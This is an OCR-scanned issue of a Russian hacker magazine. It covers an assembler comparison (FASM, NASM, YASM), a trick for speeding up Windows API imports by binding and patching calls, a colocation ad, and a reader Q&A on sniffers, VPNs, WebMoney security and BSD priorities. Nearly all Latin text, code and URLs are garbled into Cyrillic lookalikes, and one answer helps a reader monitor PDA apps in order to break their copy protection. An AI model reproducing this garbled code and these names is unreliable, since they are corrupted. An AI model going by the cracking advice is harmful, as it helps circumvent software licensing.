ту перенесен на МЗ-ЭОЗ, ѴѴіпсІоѵѵз 9х/І\ІТ, 
І_ІІ\ІІІХ, ВЗЭ, поддерживает уникод и все х86 
процессоры, вплоть до Репііит-4 с наборами 
мультимедийныхинструкций ММХ, ЗЗЕ, ЗЗЕІІ, 
ЗЗЕІІІ, АМЭЗЭКІоѵѵ!, а также платформу 
АМЭ х86-64, позволяя генерировать не толь- 
ко Місгозоіі соф но и готовые Ып-, тг-, ре- и 
еІРфайлы. То есть РАЗМ позволяет обходить- 
ся без линкера, но при этом раскладку секций 
в РЕ-файле и таблицу импорта приходится со- 
здавать «вручную» с помощью специальных 
директив ассемблера. Ріо на практике все же 
удобнее сгенерировать соіі и скомпоновать 
его с модулями, написанными на языках вы- 
сокого уровня. Макроязык РАЗМ'а настолько 
мощный, что позволяет писать программы на 
себе самом без единой ассемблерной стро- 
ки, например: 

йіе 'іпіегр.азт' 
гереаі $ 

ІоасІ А Ьуіе Рот %-1 
І^А>='а' &А<=' 2 ‘ 

А = А-'а'+УѴ 
епсі 



зіоге Ьуіе АаІ%-1 
епсі гереаі 

И пускай кто-то ворчит: ну вот, мол, еще одна 
попытка опустить ассемблер до уровня Бей- 
сика. РІичего подобного! Макросы — вещь 
добровольная. Хочешь — пользуйся, не хо- 
чешь — не надо. 

Все это были достоинства. Теперь поговорим 
о недостатках. РНи на что не похожий синтаксис 
РАЗМ'а напрягает даже матерых программис- 
тов, заставляя их вгрызаться в плохо струк- 
турированную документацию и небольшое 
количество демонстрационных примеров, 
поставляемых вместе с транслятором. Ріа это 
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требуется время, которое в конечном счете ни- 
чем не компенсируется, поскольку круг задач, на 
которых РАЗМ реально рвет МАЗМ, крайне мал. 
Категорическая несовместимость с МАЗМ'ом 
чрезвычайно затрудняет разработку ѴѴіпбоѵѵз- 
драйверов (в большинстве своем создаваемых 
на основе примеров из БОК). Прикладным зада- 
чам, в свою очередь, требуется ЗБК и желатель- 
но первой свежести, да и программы, целиком 
написанные на ассемблере, — это совсем не 
то, чего требует бизнес-машина. «Математичес- 
кие» задачи, перемножающие матрицы, вычис- 
ляющие координаты пересечения кривых в ІМ- 
мерном пространстве или трансформирующие 
графику, легко пишутся на РАЗМ'е, поскольку не 
привязаны кконкретной операционной системе. 
Никаких АРІ-функций они не вызывают и, вооб- 
ще, не лезут туда, где можно обойтись Си/Си++. 
Если бы РАЗМ поддерживал генерацию от- 
ладочной информации, то его (с некоторой 
натяжкой) еще можно было бы ассматривать 
как серьезный инструмент, а так он остается 
игрушкой, пригодной для мелких задач типа 
«НеІІо, ѵѵогісі», вирусов, демок и прочих произ- 
ведений хакерского творчества. 

Наконец, ни у кого нет гарантий, что создатель 
РАЗМ'а не утратит к нему интереса, а ведь без 
поддержки новых процессорных инструкций 
всякий транслятор обречен на медленное, но 
неизбежное вымирание. Открытость исходных 
текстов тут не поможет, ведь, кроме них, нужна 
еще и команда. Дожны быть «носители знания», 
способные удержать детали проекта у себя в 
голове, а тот факт, что РАЗМ написан на себе 
самом, увы, читаемости листингам отнюдь не 
добавляет. 

ОЫА8М 

Транслятор ІМАЗМ (расшифровывается как 
ІМеіѵѵісІе АззетЫег — расширенный ассем- 
блер) возник тогда, когда не было ни одного 
хорошего свободного ассемблера под х86. 
РАЗМ'а тогда еще не существовало. МАЗМ/ 
ТАЗМ стоили денег и работали только под МЗ- 
ООЗ/ѴѴіпсІоѵѵз. Единственный более-менее ра- 
ботающий транслятор под ІЛМІХ — ОАЗ (ОШ 
АззетЫег) — завязан на компилятор ОСС и 



имеет такой ужасный синтаксис, что писать на 
нем могуттолько мазохисты. Остальные ассем- 
блеры (типа А86, А386) не позволяют писать 
16/32-разрядный код или раздаются практи- 
чески без документации. 

Кончилось это дело тем, что группа програм- 
мистов во главе с Петром Анвином (Реіег Апѵіп) 
решила разработать собственный ассемблер. 
МАЗМ-подобный синтаксис, мощная макросис- 
тема(впрочем, несовместимая с МАЗМ'ом), под- 
держка всей линейки х86 процессоров, вплоть 
до ІА64 в х86-режиме, богатство выходных 
файлов (Ып, аоиі, аоиіЬ, соТС, еІТ, аз86, оЬі, \д/іп32, 
гсІТ, іеее), генерация отладочной информации 
в форматах ВогІапсІ, ЗТАВЗ и 0ѴѴАВР2 вкупе 
с портами под МЗ-БОЗ, ѴѴіпсІоѵѵз, І_іпих и ВЗБ 
обеспечили ІМАЗМ'у неслабую популярность, но 
без ярко выраженного фанатизма, характерно- 
го для РАЗМ'а. Количество ошибок в транслято- 
ре довольно много, причем, в отличие от рабо- 
тающих продуктов (МАЗМ/ТАЗМ), при «хитрых 
ошибках» ІМАЗМ не падает, а генерирует оши- 
бочный (по структуре) объектный файл. Плюс, 
конечно же, как это принято в Ореп Зоигсе- 
соттипііу, полное игнорирование баг-репор- 
тов, «неудобных» для авторов (разработчики 
даже утверждают, что ошибок в их трансляторе 
вообще нет, в смысле им не известен ни один). 
Тем не менее, в последней версии ІМАЗМ'а, в 
зависимости от значения ключа -Оп, код может 
сгенерироваться в 2-х или более экземплярах 
или может пропасть весь экспорт (риЬсІеІ'ы). 

К минусам ІМАЗМ'а можно отнести и отсутствие 
поддержки уникода, платформы АМОх86-64, 
формата отладочной информации СобеѴіеѵѵ и 
некоторые странности синтаксиса. В частнос- 
ти, команда «тоѵ еах, 1» не оптимизируется, 
и транслятор умышленно оставляет место для 
32-разрядного операнда. Если же мы хотим 
получить «короткий» вариант, то размер опе- 
ранда необходимо специфицировать явно: 
«тоѵ еах, Ьуіе 1 », что очень сильно напрягает, 
или использовать опцию «-Оп» для автомати- 
ческой оптимизации. 

Также необходимо принудительно указывать 
длину переходов збоіі или пеаг, иначе очень лег- 
ко нарваться на ругательство «збогі щтр оиі оі 



гапде». Но существует возможность настроить 
транслятор на генерацию пеаг-переходов по 
умолчанию. Г ораздо хуже, что ІМАЗМ не помнит 
типы объявляемых переменных и не имеет нор- 
мальной поддержки структур. 

Из мелких недочетов можно назвать невозмож- 
ность автоматической генерации короткого 
варианта инструкции «ризб ітт8» и отсутствие 
контроля над соответствием транслируемых 
инструкций типу указанного процессора (ко- 
манда «сриісі» под «.486» ассемблируется впол- 
не нормально, а ведь не должна). 
Непосредственная трансляция примеров из 
ЗОК/ОБК под ІМАЗМ'ом невозможна, так что 
разрабатывать на нем драйвера под ѴѴіпсІоѵѵз 
может только очень крутой поклонник или из- 
вращенец. ІМАЗМ — один из лучших ассембле- 
ров под иих/ВЗБ, а вот под ѴѴіпсІоѵѵз его позиции 
уже не так сильны (в основном из-за неполной 
совместимости с МАЗМ'ом). 

□ УА8М 

Когда развитие ІМАЗМ'а приостановилось, его 
исходные тексты легли в основу нового транс- 
лятора — УАЗМ, что в зависимости от настро- 
ения может расшифровываться и какУез, іі'з 
ап аззетЫег, и как Уоиг іаѵогііе аззетЫег, и 
как Уеі апоібег аззетЫег, и даже как ѴѴНу ап 
аззетЫег (последнее — шутка). 

Вот основные отличительные черты УАЗМ'а от 
его предшественника: поддержка платформы 
АМБ х86-64, оптимизированный парсер, пере- 
варивающий синтаксис как ІМАЗМ, так и ОАЗ, 
более полная поддержка СОРЕ (БШРР) и ѴѴіп32 
оЬ] выходных файлов, генерация отладочной 
информации в формате СобеѴіеѵѵ, интерна- 
ционализация (выполненная через ОШ-биб- 
лиотеку деДехі) и прочие мелкие улучшения, 
которых вполне достаточно, чтобы потес- 
нить ІМАЗМ в мире ІЛМІХ-подобных систем, где 
ОАЗ-синтаксис по-прежнему играет ведущую 
роль. Под ѴѴіпсІоѵѵз же УАЗМ не имеет никаких 
ощутимых преимуществ перед МАЗМ'ом, за 
исключением того, что поддерживает возмож- 
ность генерации двоичных файлов, особенно 
удобных для создания збеІІ-кода, но бесполез- 
ных для разработчика драйверов. ПС 
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НЕДЕТСКИЙ 
(ТРЮК ОТ КРИСА 

ОКРУЖЕННЫЙ КОМПЬЮТЕРАМИ, ОПУТАННЫЙ ПРОВОДАМИ, Я СИДЕЛ 
В ГЛУБИНЕ СВОЕЙ ХАКЕРСКОЙ НОРЫ И ТОЧИЛ ЗВЕРСКИЙ ПЛАН, КО- 
ТОРЫЙ ВПОСЛЕДСТВИИ ОБОГНАЛ МІСВОЗОЕТ! ДА ЕЩЕ КАК ОБОГНАЛ! 
СКОРОСТЬ ИМПОРТА ВОЗРОСЛА НА ПОРЯДОК, ОТЛИЧНО РАБОТАЯ КАК 
НА ДРЕВНЕЙ 9Х, ТАК И НА НОВОМ ѴѴІІХЮОѴѴЗ ЗЕВѴЕВ 2003, ВКЛЮЧАЯ ВСЕ 
ПРОМЕЖУТОЧНЫЕ СИСТЕМЫ, ПРИЧЕМ БЕЗ ГРАММА АССЕМБЛЕРНОГО 
КОДА! ВСЕ НА 100% СИ! 



СВЕРХБЫСТРЫЙ ИМПОРТ АРІ-ФУНКЦИЙ 



О Коварство и любовь от МісговоП 

Рассмотримустройствостандартнойтаблицы им- 
порта. На вершине иерархии находится структу- 
ра Ітрогі Эігесіогу ТаЫе, представляющая собой 
массив структур I МАО Е_ІМРОРТ_ОЕЗСРІ РТОВ, 
завершаемых нулевым элементом. Каждый 
I МАО Е_ІМРОРТ_ОЕЗСРІ РТОВ содержит ссылки 
на две подчиненные структуры — Іоокир-табли- 
цу, содержащую имена и/или ординалы импор- 
тируемых функций (Ітрогі ІЧате ТаЫе), и таблицу 
импортируемых адресов (Ітрогі Аббгезз ТаЫе), 
также известную как Тбипк ТаЫе. В процессе за- 
грузки файла сюда записываются эффективные 
адреса импортируемых функций. 

Обе таблицы представляют собой массив 32-битных 
элементов, индексы которых взаимно соответствуют 
друг другу. То есть, если необходимая нам функция 
зоте_1ипс находится в і-элементе Іоокир-таблицы, 
тогда (после загрузки файла в память) і-индекс табли- 
цы импортируемых адресов будетсодержать эффек- 
тивный виртуальный адрес зоте_іипс. 

іуресіеі зігисі _І МАО Е_І М РО ВТ_0 ЕЗС В I РТОВ { 

ипіоп{ 

ОѴѴОНО Сбагасіегізіісз; 

ОѴѴОНО ОгідіпаІРІгзІТГіипк; 

I 

ОѴѴОНО ТітеОаіеЗіатр; 

ОѴѴОНО РогѵѵагсІегСГіаіп; 

ОѴѴОНО ІЧате; 

ОѴѴОНО ЕігзіТбипк; 

} ІМАОЕ_ІМРОНТ_ОЕ5СНІРТОН; 

До загрузки файла в память таблица импортируемых 
адресов дублирует Іоокир-таблицу, что (теоретичес- 
ки) позволяет загрузчику обходится одной лишь таб- 
лицей виртуальных адресов, избавляясь от прыжков 
по памяти, но практически он ее игнорирует. 
Создадим простейшую программу іезі.с и 
откомпилируем ее компилятором Місгозоіі ѴізиаІ 



С++ с настройками по умолчанию. 

#іпсІисІе <зісііо.іі> 

таіп() { ргіпіі("ЬеІІо, ѵѵогісі !\п"); } 

Образовавшийся файл іезі.ехе пропустим че- 
рез утилиту битрЬіп, входящую в состав М3 ѴС 
(сІитрЬіп /ІМРОВТЗ іезі.ехе > оиі), и посмот- 
рим, что хорошего она нам скажет: 

405000 Ітрогі Асісігезз ТаЫе 



4054АС Ітрогі Чате ТаЫе 



0 ііте сіаіе зіатр 


0 Іпсіех оі іігзі іогѵѵагсіег геіегепсе 




20Е 


ѴѴгііеЕІІе 




174 


ОеіѴегзіоп 




70 


ЕхііРгосезз 



Ага, таблица адресов располагается по адре- 
су 4050006, а Іоокир-таблица — по 4054АС6. 
Заглянув туда біеѵѵ'ом, мы увидим ВѴА-адреса 
имен импортируемых функций. Обе таблицы 
полностью совпадают и указывают на массив 
имен/ординалов импортируемых функций. 

А теперь пропустим через битрЬіп «Блок- 
нот» из стандартной поставки І\ІТ (битрЬіп / 
ІМРОВТЗ поіераб.ехе > оиі) и увидим, в чем 
состоит разница. 

і^ікшвУіЬІ 

1001080 Ітрогі Асісігезз ТаЫе 
1 006784 Ітрогі Чате ТаЫе 
ЕЕЕЕЕЕЕЕ ііте сіаіе зіатр 
ЕЕЕЕЕЕЕЕ Іпсіех оі іігзі іогѵѵагсіег геіегепсе 
77Е99Е42 1 ЕЕ ЬосаЮпІоейс 

77Е8В7Е4 1АЕ ОІоЬаІІІпІоск 

77Е8ССАЗ 1А7 ОІоЬаНоск 

Т абл ица адресов еще до загрузки файла в память 



уже содержит готовые эффективные виртуаль- 
ные адреса! Если не веришь — смотри біеѵѵ'ом 
Содержимое таблицы адресов — эффективные 
виртуальные адреса импортируемых функций! 
Благодаря этой хитрости системному загрузчику 
уже не нужно тратить время на импорт функций. 
Он просто смотрит на поле временной отметки 
(ТітеОаіеЗіатр) импортируемой ОІ_І_, и, если оно 
совпадет с ОІ_І_, установленной на компьютере, 
реальный импорт не производится. В противном 
случае, конечно, приходится напрягаться и тра- 
тить такты процессора на загрузку, но Місгозоіі 
обновляет свои прикладные приложения синх- 
ронно с обновлением системных библиотек, по- 
этому ее программы получают огромное преиму- 
щество над конкурентами. Какое коварство! 
Такая техника импорта функций называется бин- 
дингом (Ьіпбіпд) и при желании может быть реа- 
лизованаспомощьюутилитыебШоіп, позаимство- 
ванной все из того же компилятора (ебііЬіп /ВІІ\Ю 
іезі.ехе). Посмотрим, что она сделала с нашим 
тестовым файлом? А сделала она с ним вот что: 

ЯИИИЮ УІ 

405000 Ітрогі Асісігезз ТаЫе 

4054АС Ітрогі ІЧате ТаЫе 

44В1 7В02 ііте сіаіе зіатр 

1 3 Іпсіех оі іігзі іогѵѵагсіег геіегепсе 
7944639С 20Е ѴѴгііеЕІІе 

7945СЮЮ 174 ОеіѴегзіоп 

794569ВЕ 70 ЕхііРгосезз 

После биндинга ВѴА-адреса имен АРІ-функций 
сменились эффективными виртуальными адреса- 
ми самих АРІ-функций. И теперь наша программа 
будет загружаться не хуже, чем у Місгозоіі? А вот и 
нет. Это натвоей системе онабудетзагружаться «не 
хуже», а вот у большинства остальных пользовате- 
лей временная отметка ЭЦ_ наверняка не совпадет 
с твоей — и вся оптимизация пойдет насмарку, тем 





Соіосаііоп 

Размещение оборудования в Москве 




более что Місгозой имеет тенденцию обновлять ОН не только с каждой верси- 
ей операционной системы, но даже с установкой очередного Зегѵісе Раск'а! 
Кажется, что ситуация — ласты, но это не так... 

О Как утереть нос М іеговой 

Самое простое решение — это тащить за собой ебШэіп (благо лицензия 
этого не запрещает) и делать биндинг непосредственно при установке 
программы. Нежелающие связываться с МісгозоІІ могут реализовать ути- 
литу для биндинга самостоятельно или воспользоваться линкером иііпк 
от Юрия Харона. Но прежде чем открывать пиво и праздновать победу, 
задумаемся: что произойдет, если пользователь обновит систему после 
установки нашей программы? Правильно! Биндинг тут же перестанет ра- 
ботать, скорость загрузки упадет в разы, а это нехорошо. Можно, конечно, 
порекомендовать пользователю переустановить нашу программу после 
всякого обновления системы, но это негуманно и, вообще, жестоко. Го- 
раздо проще поступить так. Пусть при каждом запуске наша программа 
проверяет ТітеЭаІеЗіатр всех импортируемых ОІ_І_ и, если он изменился, 
запускает ебШэіп (или другую утилиту) для ре-биндинга. Поскольку править 
активный процесс нельзя, то его необходимо завершить, породив перед 
этим дочерний субпроцесс или запустив Ьаі-файл, который бы ре-биндил 
нашу программу и тутже перезапускал ее вновь, чтобы эти махинации про- 
текали прозрачно для пользователя и не высаживали его на измену. 

О Экстремальная оптимизация 

Дизассемблировав поіераб.ехе или наш оптимизированный {езі.ѳхе, мы 
увидим, что все АРІ-функции вызываются косвенным образом, что сов- 
сем не способствует производительности. 

.16x1:00401 15Р ризИОРРИ 

Техі: 00401 164 саІІ сІз:[ЕхііРгосезз] 

Прямой саІІ абсіг намного быстрее, чем саІІ [асісіг] (особенно в циклах), 
так почему бы не извернуться и не «вживить» в программу эффектив- 
ные адреса АРІ-функций, определяемые на стадии установки через 
ОеіРгосАббгезз (естественно, не забывая о контроле отметки времени)? 
Ни одна из известных мне утилит этого делать не умеет, поэтому прихо- 
дится шевелить хвостом и кодить на Си самостоятельно. 

Разбирая таблицу импорта откомпилированной программы, нахо- 
дим все перекрестные ссылки на АРІ-функции, и, если там будет 
РРИ 1 5И ХХИ ХХН ХХИ ХХИ (косвенный саІІ), записываем поверх него 
ЕВ ѴѴН ѴѴН УУИ УУИ 90И (непосредственный САП + І\ІОР; зачем нам ну- 
жен ІЧОР? А затем, что непосредственный вызов на байт короче), где УУН 
УУИУУИУУИ — относительный адрес АРІ-функции, отсчитываемый от кон- 
ца инструкции САП. После этого отбрасываем таблицу импорта, оставляя 
лишь КЕПІ\ІЕІ_32.ЭІ_І_ с единственной импортируемой функцией (неваж- 
но какой). Дело в том, что системный загрузчик ѴѴіпбоѵѵз 2000 содержал 
ошибку и отказывался загружать программы, не импортирующие ни од- 
ной функции из КЕПІ\ІЕІ_32.ЭІ_І_, а значит, не проецирующих ее на свое 
адресное пространство. Поскольку сам загрузчик нуждался в КЕВІ\ІЕІ_32. 
ЭЦ-, но забывал проверить, была ли она вообще спроецирована или нет, 
приложения без таблицы импорта падали с исключением. 

В итоге мы: а) сократим размер файла за счет отказа от таблицы импор- 
та; б) ускорим загрузку файла; в) слегка оптимизируем вызов АРІ-функций 
(впрочем, поскольку выполнение подавляющего большинства АРІ-функ- 
ций занимает существенное время, разница между прямым и косвенным 
вызовом будет не столь уж и заметной, однако существуют АРІ-функции, 
содержащие всего несколько строк, например ОеІІ_азіЕггог). 

О Заключение 

Это только кажется, что ѴѴіпсІоѵѵз истоптана вдоль и поперек! На самом 
деле, потенциал оптимизации еще не исчерпан, и творчески мыслящий 
программист всегда найдет неординарное решение, обгоняющее по 
скорости саму МісгозоШ з: 



Что такое размещение сервера (со-Іосаііоп) ? 
Со-Іосаііоп — это размещение Вашего сервера на 
площадке (в дата-центре) провайдера, в 19” стойке 
(гаек). Услуги по размещению сервера (соііосаііоп), 
включают наличие основного и резервного электро- 
питания, контроля температурно-влажностного 
режима, системы автоматического газового пожаро- 
тушения, ограничение доступа к Вашему оборудова- 
нию, наличие быстрых основного и резервного 
интренет-каналов, сохранность Ваших серверов, 
и опционально — услуги по администрированию 
серверов. 

Вам либо будет предоставлен в аренду Интернет- 
канал гарантированной пропускной способности, 
либо будет предложено оплачивать трафик, при 
некоторых условиях трафик может быть бесплатный. 

Почему размещать оборудование у нас? 

— Мы размещаем оборудования в двух дата-центрах 
в Москве: дата-центре М9 и дата-центре СТЕК; 

— Мы обеспечиваем круглосуточный мониторинг 
работоспособности Ваших серверов; 

— Мы обеспечиваем Вам доступ к оборудованию по 
предварительной заявке; 

— Мы предоставляем подключение на скорости от 
ІООплЬрз до ІСЬрз; 

— Мы окажем Вам помощь в решении проблем. 

Какие преимущества услуги размещения сервера? 

Услуги по размещению серверов в дата-центрах 
включают множество преимуществ для владельцев 
сайтов, таких, как: 

— Полный контроль над серверами; 

— Для серверов специальные условия хранения 
и функционирования; 

— Серверы настолько быстры и производительны, 
как вы захотите, вы можете обновлять серверы; 

— Уменьшенная зависимость от услуг провайдеров, 
большинство задач администрирования и настроек 
можно проводить удаленно, значительная гибкость; 

— Возможность использовать имеющиеся серверы; 

— Построение собственных отказоустойчивых 
решений. 

тел. (495) 788-94-84 
ѵѵѵѵѵѵ.Ьезі-ІіоБііпа.ги 
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СТЕПАН ИЛЬИН АКА ЗТЕР 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ 

'мне посылать вопросы, так или иначе 

.СВЯЗАННЫЕ С ХАКОМ/КРЭКОМ/ФРИКОМ 
— ДЛЯ ЭТОГО ЕСТЬ НАСК-ЕАО (НАСКЕАО@ 

. ВЕАЬ.ХАКЕР.ВЫ), НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕН- 
НОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я 
.НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ 
ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ 
.ИНФОРМАЦИИ. 



О: Помоги. Мне нужен снифер, который 
работает на уровне сокетов. Стандарт- 
ные решения, использующие драйвер 
ѴѴіпРсар, с поставленной мною зада- 
чей не справляются, так как не могут 
перехватить данные, передаваемые 
через ОрепѴРЫ-туннель. Хотелось бы 
просто выбрать конкретное приложе- 
ние и отслеживать ее сетевую актив- 
ность. Обойтись без ОрепѴРЫ не могу 
— нужно обязательно шифровать тра- 
фик и оставаться анонимным. 

А: Ты ищешь программу ІР ЗпіТТег ( ЬНрѴ/егѵѵап. 
ПгееТгЛ — это определенно то, что тебе надо. 
Утилита представляет собой не просто сни- 
фер, это — многофункциональное решение, 
которое может перехватывать данные на са- 
мых различных уровнях: с помощью драйвера 
ѴѴіпРсар, на уровне сокетов, а также на уров- 
не спецификации ШІЗ. Не буду перечислять 
многочисленные особенности этой програм- 
мы, а сразу дам тебе готовый рецепт. В меню 
программы переходи «ТооІз->ѴѴіп5оскНоок». 
Появится дополнительное окно снифера для 
перехвата активности конкретного сетевого 
приложения. Чтобы начать снифинг, надо оп- 
ределить нужное тебелриложение — если ты . 
знаешь РЮ процесса, то достаточно вписать 
его в поле Ргосезз Ю. В противном случае при- 
годится специальный мастер, который вызы- 
вается с помощью специальной кнопки рядом. 
Вот, собственно, и все. Теперь любая актив- 
ность приложения, связанная с сокетами, бу- 
дет наглядно представлена в окне ІР Зпі|Іег’а. 
Ты сможешь увидеть, что, куда и в какой фор- 
ме передается. 



Аналогичными функциями способен пора- 
довать и другой мощный продукт — ШгазпПТ 
( ѵ\лАл/ѵ.тзптопі^ог.сот/иІ^газпіШ Т Однако, не 
в пример ІР Зпіііег’у, он распространяется на 
платной основе. 

О: Как можно обез іасить себя от кра- 
жи денег с ѴѴеЬтопеу-кошелька? Слы- 
шал о каком-то специализированном 
сервисе для хранения файлов-клю- 
чей. Расскажешь? 

А: Такой сервис действительно есть и досту- 
пен в инете по адресу: ШжкШ- Используемый 
этим любопытным сервисом механизм, с од- 
ной стороны, очень прост. С другой— чрезвы- 
чайно эффективен и практически на 1 00% га- 
рантирует сохранность твоих ключей. Епит. 
Ш позволяет отказаться от хранения ключей 






ния транзакции. Как это работает? Сейчас 
объясню. 

Для использования системы понадобит- 
ся телефон с поддержкой ^ѵа или КПК на 
базе РоскеіРС и еще несколько минут сво- 
бодного времени. Смысл всей затеи в том, 
что любые операции с кошельком будут 
осуществляться посредством специального 
кода. Сам код не хранится на компьютере, 
а каждый раз генерируется уникальной для 
каждого пользователя программой, которая 
устанавливается нателефон или карманный 
ПК. Первым делом нужно зарегистрировать- 
ся в системе 

указав реальный почтовый ящик — на него 
придет ссылка на мобильную программу. 
Далее в параметрах кипера нужно найти 
вкладку «Безопасность» и в качестве места 
ѴѴеЬтопеу на локальном диске или флашке . для хранения ключей выбрать Епит-Зіогаде. 



— вместо этого конфиденциальные данные 
помещаются в безопасное хранилище Епит. 
В таком случае ты совершенно спокойно 
сможешь запускать ѴѴеЬтопеу Кеерег на чу- 
жой машине, осуществлять многочисленные 
транзакции, при этом нисколько не опасаясь 
засохранность ключиков. Скажу больше: при 
оплате сервисов в интернете тебе вообще не 
понадобится запускать кипер для соверше- 



В появившемся окошке введи е-таіі, кото- 
рый указывал при регистрации на епит.ги . 
Если ты все сделал правильно, то начнется 
процесс авторизации. -Он проходит по при- 
нципу «Вопрос-ответ» — система даст тебе 
■псевдослучайное число, которое ты должен 
использовать, когда будешь генерить код с 
помощью мобильной программы Епит СІіепі. 
Просто введи его в нужное поле и жми «По- 







будет правильным (а он будет), то перенос 
ключей будет успешно осуществлен. Далее 
все операции будут осуществляться по тому 
же [принципу: для совершения операции, 
тебе будут присылать число («вопрос»), из 
которого, ты будешь создавать код для ав- 
торизации («ответ»). Если код правильный, 
то затребованная операция успешно завер- 
шится. В противном случае происходит об- 
лом. Это касается как входа в систему, так и. 
совершения покупок через онлайн-мерчант 
ѴѴебМопеу. Попробуй и поймешь, насколько- 
это удобно. 

О: Хочу оргаі ов гь виртуальную ло- 
кальную сеть между двумя компьюте- 
рами в инете. То есть требуется поднять 
пол іное ѴРЫ-< единение, чтобы 
можно было і ѵіениваться расшарен- 
ными ресурсами, играть в игры и т.д. По- 
уй, как это сделать с меньшей кро- 
вью? Разбираться с ОрепѴРЫ, Ііпс’ом и 
прочими комплексными решениями 
очень не хочется. 

А: Самым простым вариантом, безусловно, 
является небольшая программа Натасбі 
( \А/\А/ѵѵ■IтатасIті■сс , )■ Во время установки прога 
инсталлит в системе виртуальный сетевой' 
адаптер, поэтому в списках подключений по- 
является новый пункт — НаптасЫ. Брать быка 
за рога и пытаться лезть в его настройки не 
стоит. Вместо этого через меню «Пуск» запус- 
ти само приложение. С его помощью наладить 
полноценный ѴРІЧ-туннель можно всего за не- 
сколько кликов мышью. Достаточно дождать- 
ся пока программа присоединится к управля- 
ющему серверу и создать свою виртуальную 
сеть. Во время регистрации ѴРЫ необходимо 
ввести ее имя и пароль — далее эти парамет- 
ры потребуются компьютерам для подключе- 
ния к виртуальной сети. Собственно, на этом , 
вся настройка и заканчивается. Тебе оста- 
ется только присоединить оба компьютера к 
одному и тому же ѴРЫ и попробовать пропин- 
говать друг друга по. внутренним. ІР'шникам,. 
указанным в верхней части окна НатасЫ. Все 
должно заработать. Само собой соединение- 
осуществляется без какого-либо посредника: 
используется принцип реаг-іо-реаг, что благо- 
творно сказывается на безопасности канала. 
За сохранность данных отвечает непрерыв- 
ное шифрование с использованием 2048-бит- 
ного ключа. 

О: А что это за ка ѴѴіпсІоѵѵз 

І-іѵе, столь активно рекламируемая 




МісгозоІГом? Обычный мессенджер 
(который никому не нужен) или же в ней 
есть что-нибудь серьезное? 

А: По большому счету, это очередная про- 
грамма для обмена сообщениями, которая 
обещает заменить ѴѴіпбоѵѵз Меззепдег. Но 
есть у нее пара функций, которые выгодно 
отличают ее от всех остальных. Во-первых, 
это поддержка ЗМЗ-сообщений, так что, если 
юзер указал в своих параметрах номер сото- 
вого телефона, ты полнее можешь отправить 
ему ЗМЗ-ку. МісгозоЙ акцентирует на этом 
внимание и обещает договориться со всеми 
операторами, чтобы эта фишка работала на 
ура. Кроме традиционного текстового обще- 
ния, ты еще сможешь общаться голосом или 
даже устроить видеоконференцию. От скуки 
можно запустить одну из простеньких игр и 
сыграть по сети. Весьма любопытной особен- 
ностью является поддержка так называемых 
«Общих папок», через'которые легко и просто 
можно передавать файлы. Удобная штука, с 
учетом ТОГО, что из передачи данных посредс- 
твом аськи ничего хорошего не выходит. Ска- 
чать и потестить новинку можно с сайта ѵѵѵѵѵѵ. 
Ьеопііѵе.ги . 

О: Замечательные утилиты Гііетоп и 
Кедтоп от компании Зузіпіегпаіз (ѵѵѵѵѵѵ. 
зѵзіпіегпаіз.сот ) помогают мониторить 
активность конкретного приложения в 
системе, в частности, отследить изме- 
нения, вносимые в файловую систему 
и реестр. А существуют ли аналогич- 
ные программы, работающие на КПК? 
Хочется самостоятельно побороть за- 
щиту нескольких достойных приложе- 
ний, для которых никак не могу найти 
крэка. 

А: Действительно, найти лекарство для про- 
грамм, предназначенных для КПК, довольно 
сложно. В особенности, если приложение 
редкое или эксклюзивное. Зато отследить 
активность мобильной программы довольно 
просто. Первый инструмент, который тебе 
понадобится, — это утитита СЕЯедЗру ( ѵѵѵѵѵѵ. 
(о^ѵѵа^сIIаЬ■Сот/се^еазрѵ■І 11 т , )■ Перехватывая 
все-АРІ-функции, обращающиеся к реест- 
ру, она скрупулезно выводит лог событий на 
экран. Более того, она обладает мощными 
функциями фильтрации (ты можешь явно ука- 
зать функции, за которыми нужно следить)™ 
Примечательно, что от тех же разработчи- 
ков оченьюкора появятся две новые утилиты 
— СеТГігеасІМоп, СеАріЗру, — о назначении 
которых несложно догадаться по названию. 
Отследить изменения в файловой систе- 




ме возможно при помощи проги ЗКТгаскег 
( уууууу.з-к-1оо1з.сот ). Утилита создает слепок 
(зпарзГюі) системы и отслеживает все изме- 
нения, которые с тех пор претерпела систе- 
ма. Идеальный вариант — сделать снимки 
системы до и после установки определенной 
программы, чтобы узнать, какие изменения 
вносит прога в файловую систему и реестр 
при установки. А позже_даже-Оті^атихь_все 
изменения. 

О: Как под В$й запустить процесс с оп- 
іенным приоритетом? 

А: Значение приоритета в ВЗЭ обозначается 
целым числом, от -20 до +20. Причем прило- 
жения, запущенные с приоритетом -20, име- 
ют максимальные привилегии в системе, ате, 
что имеют приоритет +20, являются процес- 
сами наименьшей приоритетности. Значение 
приоритета по умолчанию равно нулю. Точ- 
нее говоря, если пользователь не Обращает- 
ся к пісе, приоритет запускаемого процесса 
будет унас'ледован от Предка, в простейшем 
случае — оболочки, обычно имеющей нуле- 
вое значение приоритета. Обычный пользо- 
ватель может задавать только более высо- 
кие (положительные) значения приоритета, 
понижая приоритетность запускаемых про- 
цессов. Суперпользователь может задавать 
также отрицательные значения приоритета. 
Пример прост: 

# пісе -10 /изг/ІосаІ/хакер_арр 

Правило, как понимаешь, простое: чем ниже 
значение пісе, тем выше приоритет процес- 
са. Однако стоит помнить, что часто отрица- 
тельные, низшие значения приоритета (от 
-17 до -2С0 резервируются для системных 
процессов, 

О: Где регистрируют самые 
домены? 

А: Предложений в интернете много, но все 
они касаются регистрации исключительно 
международных доменов. Например, сервис 
ѵѵѵѵѵѵ. іроѵѵегѵѵеЬ. сот за регистрацию в зонах 
.сот-, .пеІ,,-.огд, .из, ,ЬІ 2 ,-.іпіо просит всего 2, 95 
доллара США. Чуть больше — $4,95 — берет 
за свои услуги ѵѵѵѵѵѵ. пеКігтз. сот . Своеобраз- 
ный рекорд поставил хостер ѵѵѵѵѵѵ.аапсіі.пеі . 
который за один евро зарегистрирует тебе 
домен в зоне .іпіо. Отечественные интернет- 
* имена в зонетги менее'чем за $19 в: год найти 
